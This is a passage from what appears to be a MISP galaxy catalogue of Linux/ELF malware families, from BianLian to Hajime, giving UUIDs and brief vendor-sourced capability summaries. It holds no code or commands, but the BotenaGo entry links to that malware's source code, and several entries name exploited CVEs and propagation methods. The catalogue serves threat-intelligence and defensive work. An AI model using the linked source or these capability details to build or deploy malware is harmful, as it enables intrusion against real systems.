UUID f6be433e-7ed0-4777-876b-e3e2ba7d5c7f which can be used as unique global reference for BianLian (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BiBi-Linux

According to Security Joes, this malware is an x64 ELF executable, lacking obfuscation or protective measures. It allows attackers to specify target folders and can potentially destroy an entire operating system if run with root permissions. During execution, it produces extensive output, which can be mitigated using the "nohup" command. It also leverages multiple threads and a queue to corrupt files concurrently, enhancing its speed and reach. Its actions include overwriting files, renaming them with a random string containing "BiBi," and excluding certain file types from corruption.

Internal MISP references

UUID efec7bb0-4ec7-4c97-a8a9-28e0fea19852 which can be used as unique global reference for BiBi-Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Bifrost

Linux version of the bifrose malware that originally targeted Windows platform only. The backdoor has the ability to perform file management, start or end a process, or start a remote shell. The connection is encrypted using a modified RC4 algorithm.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bifrost.

Known Synonyms
elf.bifrose
Internal MISP references

UUID 8fa6dd0e-b630-419f-bd01-5271dd8f27c6 which can be used as unique global reference for Bifrost in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BigViktor

A DDoS bot abusing CVE-2020-8515 to target DrayTek Vigor routers. It uses a wordlist-based DGA to generate its C&C domains.

Internal MISP references

UUID 901ab128-2d23-41d7-a9e7-6a34e281804e which can be used as unique global reference for BigViktor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BioSet

Internal MISP references

UUID 8e301f58-acef-48e7-ad8b-c27d3ed38eed which can be used as unique global reference for BioSet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Black Basta (ELF)

ESXi encrypting ransomware, using a combination of the stream cipher ChaCha20 and RSA.

Internal MISP references

UUID 35c86fef-18fe-491c-ad3c-13f98e8f5584 which can be used as unique global reference for Black Basta (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BlackCat (ELF)

ALPHV, also known as BlackCat or Noberus, is a ransomware family that is deployed as part of Ransomware as a Service (RaaS) operations. ALPHV is written in the Rust programming language and supports execution on Windows, Linux-based operating systems (Debian, Ubuntu, ReadyNAS, Synology), and VMWare ESXi. ALPHV is marketed as ALPHV on cybercrime forums, but is commonly called BlackCat by security researchers due to an icon of a black cat appearing on its leak site. ALPHV has been observed being deployed in ransomware attacks since November 18, 2021.

ALPHV can be configured to encrypt files using either the AES or ChaCha20 algorithms. In order to maximize the amount of ransomed data, ALPHV can delete volume shadow copies, stop processes and services, and stop virtual machines on ESXi servers. ALPHV can self-propagate by using PsExec to remote execute itself on other hosts on the local network.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BlackCat (ELF).

Known Synonyms
ALPHV
Noberus
Internal MISP references

UUID 860e9d03-830e-4410-ac89-75b6eb89e7e5 which can be used as unique global reference for BlackCat (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BlackMatter (ELF)

Internal MISP references

UUID 1277a4bf-466c-40bc-b000-f55cbd0994a7 which can be used as unique global reference for BlackMatter (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Blackrota

Internal MISP references

UUID a30aedcc-562e-437a-827c-55bc00cf3506 which can be used as unique global reference for Blackrota in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BlackSuit (ELF)

According to Trend Micro, this ransomware has significant code overlap with Royal Ransomware.

Internal MISP references

UUID 5bdbeaae-0def-4547-9940-33ad94060955 which can be used as unique global reference for BlackSuit (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BOLDMOVE (ELF)

According to Mandiant, this malware family is attributed to potential chinese background and directly related to observed exploitation of Fortinet's SSL-VPN (CVE-2022-42475). There is also a Windows variant.

Internal MISP references

UUID 8f347147-c34e-4698-9439-c640233fca15 which can be used as unique global reference for BOLDMOVE (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Bootkitty

Internal MISP references

UUID 8fc5c777-379e-4487-b108-88af1fca8a01 which can be used as unique global reference for Bootkitty in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Break out the Box

This is a pentesting tool and according to the author, "BOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also being CI/CD friendly with common CI/CD technologies.".

It has been observed being used by TeamTNT in their activities for spreading crypto-mining malware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Break out the Box.

Known Synonyms
BOtB
Internal MISP references

UUID 57c9ab70-7133-441a-af66-10c0e4eb898b which can be used as unique global reference for Break out the Box in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BotenaGo

According to Alien Labs, this malware targets embedded devices including routers with more than 30 exploits. SourceCode: https://github.com/Egida/kek/blob/19991ef983f838287aa9362b78b4ed8da0929184/loader_multi.go (2021-10-16)

Internal MISP references

UUID dffcc168-cb76-4ae6-b913-c369e92c614b which can be used as unique global reference for BotenaGo in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BPFDoor

BPFDoor is a passive backdoor used by a China-based threat actor. This backdoor supports multiple protocols for communicating with a C2 including TCP, UDP, and ICMP allowing the threat actor a variety of mechanisms to interact with the implant.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BPFDoor.

Known Synonyms
JustForFun
Internal MISP references

UUID 3c7082b6-0181-4064-8e35-ab522b49200f which can be used as unique global reference for BPFDoor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BQTlock (ELF)

Internal MISP references

UUID 871ddba3-5479-41b4-986b-97f3baef6be8 which can be used as unique global reference for BQTlock (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BRICKSTORM

According to Google, BRICKSTORM is used to consistently target appliances, among them primarily VMware vCenter and ESXi hosts.

Internal MISP references

UUID 3b503e48-c50c-49ee-ab68-3c2f87eae398 which can be used as unique global reference for BRICKSTORM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

brute_ratel

Internal MISP references

UUID 2fa4ac4e-3f89-4fd0-b4fd-2c776dcf69d8 which can be used as unique global reference for brute_ratel in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BUSHWALK

According to Mandiant, this is a webshell, written in Perl.

Internal MISP references

UUID 77b96da8-d4c1-430d-8b08-3b4893e5d3ce which can be used as unique global reference for BUSHWALK in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Bvp47

Pangu Lab discovered this backdoor during a forensic investigation in 2013. They refer to related incidents as "Operation Telescreen".

Internal MISP references

UUID 0492f9bf-3c5d-4c17-993b-2b53d0fb06f7 which can be used as unique global reference for Bvp47 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Caja

Linux malware cross-compiled for x86, MIPS, ARM. XOR encoded strings, 13 commands supported for its C&C, including downloading, file modification and execution and ability to run shell commands.

Internal MISP references

UUID 06816c22-be7c-44db-8d0d-395ab306bb9b which can be used as unique global reference for Caja in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Caligula

According to Avast Decoded, Caligula is an IRC multiplatform bot that allows to perform DDoS attacks. It is written in Go and distributed in ELF files targeting Intel 32/64bit code, as well as ARM 32bit and PowerPC 64bit. It is based on the Hellabot open source project.

Internal MISP references

UUID c936f24c-c04a-4cab-9ac6-6384a2d4c283 which can be used as unique global reference for Caligula in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Capoae

XMRig-based mining malware written in Go.

Internal MISP references

UUID c1b0528b-c674-4c76-8e1d-5846ba8af261 which can be used as unique global reference for Capoae in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

cd00r

A backdoor for UNIX operating systems that implements knocking as authentication method.

Internal MISP references

UUID 94b4c990-9beb-4bcd-bd19-9ad8fe4386b9 which can be used as unique global reference for cd00r in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CDorked

This is in the same family as eBury, Calfbot, and is also likely related to DarkLeech

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CDorked.

Known Synonyms
CDorked.A
Internal MISP references

UUID bb9eaaec-97c9-4014-94dd-129cecf31ff0 which can be used as unique global reference for CDorked in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CDRThief

Internal MISP references

UUID 27d06ac9-42c4-433a-b1d7-660710d9e8df which can be used as unique global reference for CDRThief in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Cephei

Internal MISP references

UUID baa0704b-50d8-48af-91e1-049f30f422cc which can be used as unique global reference for Cephei in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Cetus

Internal MISP references

UUID 7a226df2-9599-4002-9a38-b044e16f76a9 which can be used as unique global reference for Cetus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Chalubo

Sophos describes this malware as a DDoS bot, with its name originating from ChaCha-Lua-bot due to its use of ChaCha cipher and Lua. Variants exist for multiple architectures and it incorporates code from XorDDoS and Mirai.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Chalubo.

Known Synonyms
ChaChaDDoS
Internal MISP references

UUID af91c777-93f7-4b7f-981f-141478972011 which can be used as unique global reference for Chalubo in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Chaos (ELF)

Multi-functional malware written in Go, targeting both Linux and Windows, evolved from elf.kaiji.

Internal MISP references

UUID ef03e3c3-32d5-483a-bd1f-97dd531c4bca which can be used as unique global reference for Chaos (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Chapro

Internal MISP references

UUID 700366d8-4036-4e48-9a5f-bd6e09fb9b6b which can be used as unique global reference for Chapro in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Chisel (ELF)

Chisel is an open-source project by Jaime Pillora (jpillora) that allows tunneling TCP and UDP connections via HTTP. It is available across platforms and written in Go. While benign in itself, Chisel has been utilized by multiple threat actors. It was for example observed by SentinelOne during a PYSA ransomware campaign to achieve persistence and used as backdoor. Github: https://github.com/jpillora/chisel

Internal MISP references

UUID e5600185-39b7-49a0-bd60-a6806c7d47dd which can be used as unique global reference for Chisel (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Clop (ELF)

ELF version of clop ransomware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Clop (ELF).

Known Synonyms
Cl0p
Internal MISP references

UUID 3d11ec52-9ca8-4d83-99d4-6658f306e8e4 which can be used as unique global reference for Clop (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Cloud Snooper

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cloud Snooper.

Known Synonyms
Snoopy
Internal MISP references

UUID 0b1c514d-f617-4380-a28c-a1ed305a7538 which can be used as unique global reference for Cloud Snooper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CMS8000 Backdoor

According to CISA, this is an implant found in firmware for the Contec CMS8000, a patient monitor used by the Healthcare and Public Health sector. An embedded backdoor function with a hard-coded IP address and functionality that enables patient data spillage was identified.

Internal MISP references

UUID 879cf39e-ca87-402f-87c6-2689c7da0238 which can be used as unique global reference for CMS8000 Backdoor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ConnectBack

ConnectBack malware is a type of malicious software designed to establish unauthorized connections from an infected system to a remote server. Once a victim's device is compromised, ConnectBack creates a covert channel for communication, allowing the attacker to remotely control and gather sensitive information from the compromised system.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ConnectBack.

Known Synonyms
Getshell
Internal MISP references

UUID 82c57d1b-c11b-44f7-9675-2f0d23fb543f which can be used as unique global reference for ConnectBack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Conti (ELF)

Ransomware

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Conti (ELF).

Known Synonyms
Conti Locker
Internal MISP references

UUID c1ab8323-ce61-409a-80f3-b945c8ffcd42 which can be used as unique global reference for Conti (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Cpuminer (ELF)

This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining.

Internal MISP references

UUID 8196b6f6-386e-4499-b269-4e5c65f74141 which can be used as unique global reference for Cpuminer (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Cr1ptT0r

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cr1ptT0r.

Known Synonyms
CriptTor
Internal MISP references

UUID 196b20ec-c3d1-4136-ab94-a2a6cc150e74 which can be used as unique global reference for Cr1ptT0r in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CronRAT

A malware written in Bash that hides in the Linux calendar system on February 31st. Observed in relation to Magecart attacks.

Internal MISP references

UUID c49062cc-ceef-4794-9d8a-93ede434ecfd which can be used as unique global reference for CronRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

According to CISA, Cyclops Blink appears to be a replacement framework for the VPNFilter malware exposed in 2018, and which exploited network devices, primarily small office/home office (SOHO) routers and network attached storage (NAS) devices. Cyclops Blink has been deployed since at least June 2019, fourteen months after VPNFilter was disrupted. In common with VPNFilter, Cyclops Blink deployment also appears indiscriminate and widespread. The actor has so far primarily deployed Cyclops Blink to WatchGuard and ASUS devices, but it is likely that Sandworm would be capable of compiling the malware for other architectures and firmware.

Internal MISP references

UUID 76d4b754-e025-41c5-a767-7b00a39bd255 which can be used as unique global reference for CyclopsBlink in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Dacls (ELF)

According to PCrisk, Dacls is the name of a remote access Trojan (RAT), a malicious program that allows cyber criminals to control infected computers remotely.

Research shows that this malware is tied to Lazarus Group (a group of cyber criminals) and targets Linux and the Windows Operating System. Typically, cyber criminals use RATs to steal sensitive, confidential information, infect systems with other malware, and so on. In any case, no RAT is harmless and should be uninstalled immediately.

Internal MISP references

UUID 2e5e2a7e-4ee5-4954-9c92-e9b21649ae1b which can be used as unique global reference for Dacls (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Dark

Mirai variant exploiting CVE-2021-20090 and CVE2021-35395 for spreading.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dark.

Known Synonyms
Dark.IoT
Internal MISP references

UUID d499e7ad-332f-4057-b31d-a69916408057 which can be used as unique global reference for Dark in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DarkCracks

A sophisticated payload delivery and upgrade framework, discovered in 2024. DarkCracks exploits compromised GLPI and WordPress sites to function as Downloaders and C2 servers.

Internal MISP references

UUID 043c46fc-b98a-438e-b071-3ac76380f082 which can be used as unique global reference for DarkCracks in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Dark Nexus

Internal MISP references

UUID dfba0c8f-9d06-448b-817e-6fffa1b22cb9 which can be used as unique global reference for Dark Nexus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DarkSide (ELF)

Internal MISP references

UUID 61796628-c37b-4284-9aa4-9f054cc6c3c2 which can be used as unique global reference for DarkSide (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DarkRadiation

Internal MISP references

UUID 39be337b-8a9a-4d71-949b-5efd6248fc80 which can be used as unique global reference for DarkRadiation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DDG

First activity observed in October 2017. DDG is a botnet with P2P capability that is targeting crypto currency mining (Monero).

Internal MISP references

UUID 5c42585b-ea92-4fe2-8a79-bb47a3df67ad which can be used as unique global reference for DDG in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ddoor

Internal MISP references

UUID 07f48866-647c-46b0-a0d4-29c81ad488a8 which can be used as unique global reference for ddoor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DEADBOLT

DEADBOLT is a linux ransomware written in Go, targeting QNAP NAS devices worldwide. The files are encrypted with AES128 encryption and will have the .deadbolt extension appended to file names.

Internal MISP references

UUID b37c9ba2-f1b0-4a2f-9387-7310939d2189 which can be used as unique global reference for DEADBOLT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Decoy Dog RAT

Internal MISP references

UUID 6452720d-bd35-4c55-8178-ed0dd86f4c53 which can be used as unique global reference for Decoy Dog RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Denonia

Cado discovered this malware, written in Go and targeting AWS Lambda environments.

Internal MISP references

UUID d5d9bb86-715d-4d86-a4d2-ab73085d1b0c which can be used as unique global reference for Denonia in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Derusbi (ELF)

Internal MISP references

UUID 494dcdfb-88cb-456d-a95a-252ff10c0ba9 which can be used as unique global reference for Derusbi (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DISGOMOJI

Internal MISP references

UUID 1f6098a1-2395-4329-8865-49602638f45a which can be used as unique global reference for DISGOMOJI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Dofloo

Dofloo (aka AESDDoS) is a popular malware used to create large scale botnets that can launch DDoS attacks and load cryptocurrency miners to the infected machines.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dofloo.

Known Synonyms
AESDDoS
Internal MISP references

UUID ffb5789f-d7e6-4723-a447-e5bb2fe713a0 which can be used as unique global reference for Dofloo in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Doki

Internal MISP references

UUID a5446b35-8613-4121-ada4-c0b1d6f72851 which can be used as unique global reference for Doki in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DoubleFantasy (ELF)

Internal MISP references

UUID a41d8c89-8229-4936-96c2-4b194ebaf858 which can be used as unique global reference for DoubleFantasy (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DreamBus

Internal MISP references

UUID 22ff8eac-d92e-4c6e-829b-9b565d90eddd which can be used as unique global reference for DreamBus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Ebury

This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.

This family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET.

Internal MISP references

UUID ce79265c-a467-4a17-b27d-7ec7954688d5 which can be used as unique global reference for Ebury in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Echobot

The latest in this long line of Mirai scourges is a new variant named Echobot. Coming to life in mid-May, the malware was first described by Palo Alto Networks in a report published at the start of June, and then again in a report by security researchers from Akamai, in mid-June.

When it was first spotted by Palo Alto Networks researchers in early June, Echobot was using exploits for 18 vulnerabilities. In the Akamai report, a week later, Echobot was at 26.

https://www.zdnet.com/article/new-echobot-malware-is-a-smorgasbord-of-vulnerabilities

Internal MISP references

UUID 040ac9c6-e3ab-4b51-88a9-5380101c74f8 which can be used as unique global reference for Echobot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

EdgeStepper

According to ESET Research, EdgeStepper is an adversary-in-the-middle tool, which forwards DNS traffic from machines in a targeted network to a malicious DNS node. This allows the attackers to redirect the traffic from software updates to a hijacking node that serves instructions to the legitimate software to download a malicious update.

Internal MISP references

UUID 48969976-4b49-48f9-98d1-6b85beae2a3b which can be used as unique global reference for EdgeStepper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Elevator

Internal MISP references

UUID 6ee05063-4f73-4a99-86a5-906164039a3a which can be used as unique global reference for Elevator in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

EnemyBot

According to the Infosec Institute, EnemyBot is a dangerous IoT botnet that has made headlines in the last few weeks. This threat, which seems to be disseminated by the Keksec group, expanded its features by adding recent vulnerabilities discovered in 2022. It was designed to attack web servers, Android devices and content management systems (CMS) servers.

Internal MISP references

UUID 262d18be-7cab-46c2-bcb0-47fff17604aa which can be used as unique global reference for EnemyBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Erebus (ELF)

Internal MISP references

UUID 479353aa-c6d7-47a7-b5f0-3f97fd904864 which can be used as unique global reference for Erebus (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ESXiArgs

Ransomware used to target ESXi servers.

Internal MISP references

UUID 7550af7f-91cc-49e7-a4c5-d4e4d993cbef which can be used as unique global reference for ESXiArgs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Evilginx

According to the author, Evilginx is a standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication.

Internal MISP references

UUID 8eee410f-0538-4a6c-897b-c6bf4f9f28d7 which can be used as unique global reference for Evilginx in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

EvilGnome

According to Infosec Institute, EvilGnome presents itself to unwitting Linux users as a legitimate GNOME extension. Legitimate extensions help to extend Linux functionality, but instead of a healthy boost in system functionality, EvilGnome begins spying on users with an array of functionalities uncommon for most Linux malware types.

Internal MISP references

UUID 149e693c-4b51-4143-9061-6a8698b0e7f5 which can be used as unique global reference for EvilGnome in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

EwDoor

Internal MISP references

UUID e75eb723-7c23-4a3b-9419-cefb88e5f6b7 which can be used as unique global reference for EwDoor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Exaramel (ELF)

Internal MISP references

UUID 1e0540f3-bad3-403f-b8ed-ce40a276559e which can be used as unique global reference for Exaramel (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ext4

Internal MISP references

UUID 79b2b3c0-6119-4511-9c33-2a48532b6a60 which can be used as unique global reference for ext4 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Facefish

Internal MISP references

UUID 106487ea-a710-4546-bd62-bdbfa0b0447e which can be used as unique global reference for Facefish in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FBot

Internal MISP references

UUID 501e5434-5796-4d63-8539-d99ec48119c2 which can be used as unique global reference for FBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FINALDRAFT (ELF)

Internal MISP references

UUID b82fc089-4c16-4bd6-a6d8-602b1d29e96c which can be used as unique global reference for FINALDRAFT (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FinFisher (ELF)

Internal MISP references

UUID 44018d71-25fb-4959-b61e-d7af97c85131 which can be used as unique global reference for FinFisher (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FireWood

Internal MISP references

UUID a65d5d88-c414-4670-afff-b2ff555ede8b which can be used as unique global reference for FireWood in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Flodrix

Internal MISP references

UUID c7410cab-4912-4a7b-aa7f-db5f4dbbb5e1 which can be used as unique global reference for Flodrix in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

floodor

Internal MISP references

UUID ac30f2be-8153-4588-b29c-5e5863792930 which can be used as unique global reference for floodor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Fodcha

Malware used to run a DDoS botnet.

Internal MISP references

UUID 4a64a1ca-e5bc-4a27-bff2-1c68cea05ba7 which can be used as unique global reference for Fodcha in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FontOnLake

This family utilizes custom modules allowing for remote access, credential harvesting (e.g. by modifying sshd) and proxy usage.

It comes with a rootkit as well.

Internal MISP references

UUID c530d62b-e49f-4ccf-9c87-d9f6c16617b7 which can be used as unique global reference for FontOnLake in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FritzFrog

Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet which has been actively breaching SSH servers since January 2020. It is a worm which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine’s disk.

Internal MISP references

UUID b43b7b4a-9cf4-4f98-b4d2-617a7d84bfa7 which can be used as unique global reference for FritzFrog in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Gaganode (ELF)

According to Synthient, Gaganode is a decentralized bandwidth monetization service that enables both users and publishers to earn crypto for their bandwidth or monetize other people's bandwidth. The SDK intentionally implements RCE, thus aligning Gaganode more closely with malware than standard commercial SDKs.

Internal MISP references

UUID 87d98b0f-a0a2-4de2-987b-abff4a9f4cce which can be used as unique global reference for Gaganode (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GhostPenguin

Internal MISP references

UUID 9a7d9f84-13ed-4952-bf12-5efb7382d263 which can be used as unique global reference for GhostPenguin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Gitpaste-12

Gitpaste-12 is a modular malware first observed in October 2020 targeting Linux based x86 servers, as well as Linux ARM and MIPS based IoT devices. It uses GitHub and Pastebin as dead drop C2 locations.

Internal MISP references

UUID ffd09324-b585-49c0-97e5-536d386f49a5 which can be used as unique global reference for Gitpaste-12 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Glupteba Proxy

ARM32 SOCKS proxy, written in Go, used in the Glupteba campaign.

Internal MISP references

UUID bcfec1d3-ff29-4677-a5f6-be285e98a9db which can be used as unique global reference for Glupteba Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GobRAT

Internal MISP references

UUID ddba032c-ebde-4736-b7ef-8376702dac6a which can be used as unique global reference for GobRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Godlua

Internal MISP references

UUID f3cb0a78-1608-44b1-9949-c6addf6c13ce which can be used as unique global reference for Godlua in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

gokcpdoor

According to LAC, this malware is written in Go and was observed in 2022 used by an unknown China-based APT across several incidents in Japan. This backdoor has 20 commands and connects with C2 servers via KCP over UDP.

Internal MISP references

UUID 23f97417-5028-47c0-8d97-a86b55d4f613 which can be used as unique global reference for gokcpdoor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Gomir

Internal MISP references

UUID 6fb012ce-c822-471c-9c15-4c7ecfb55528 which can be used as unique global reference for Gomir in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GOREshell

Internal MISP references

UUID 886757fe-ef0b-47fd-a236-5331d1e0aa4e which can be used as unique global reference for GOREshell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GOREVERSE

GOREVERSE is a publicly available reverse shell backdoor written in GoLang that operates over Secure Shell (SSH).

Internal MISP references

UUID f282559f-27a9-42f6-b4c7-c1cc547fb63f which can be used as unique global reference for GOREVERSE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Gorilla

A DDoS botnet, based on Mirai.

Internal MISP references

UUID 029f052f-a0f9-4902-a403-b4568fb2f25d which can be used as unique global reference for Gorilla in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GOSH

Internal MISP references

UUID 931f57f9-1edd-47b8-bf80-ae7190434558 which can be used as unique global reference for GOSH in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GoTitan

GoTitan is a DDoS bot under development, which support ten different methods of launching distributed denial-of-service (DDoS) attacks: UDP, UDP HEX, TCP, TLS, RAW, HTTP GET, HTTP POST, HTTP HEAD, and HTTP PUT.

Internal MISP references

UUID 92007a5e-d408-4c95-b4c2-7b4e4e29559e which can be used as unique global reference for GoTitan in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GreedyAntd

Internal MISP references

UUID 6aee7daf-9f63-4a70-bfe5-9c95cbdcb1e3 which can be used as unique global reference for GreedyAntd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Gwisin (ELF)

Internal MISP references

UUID c02d252d-95cc-45bc-adb6-bae51b16c55b which can be used as unique global reference for Gwisin (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HabitsRAT (ELF)

Internal MISP references

UUID e87e7f26-f2a1-437f-8650-312050e3cd48 which can be used as unique global reference for HabitsRAT (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Hadooken

Internal MISP references

UUID 84e9e1ec-3676-4d64-9134-c48221c03e38 which can be used as unique global reference for Hadooken in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Haiduc

Internal MISP references

UUID dd85732f-cbf8-4f2c-af5c-f51ef7d99b6a which can be used as unique global reference for Haiduc in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Hajime

Internal MISP references

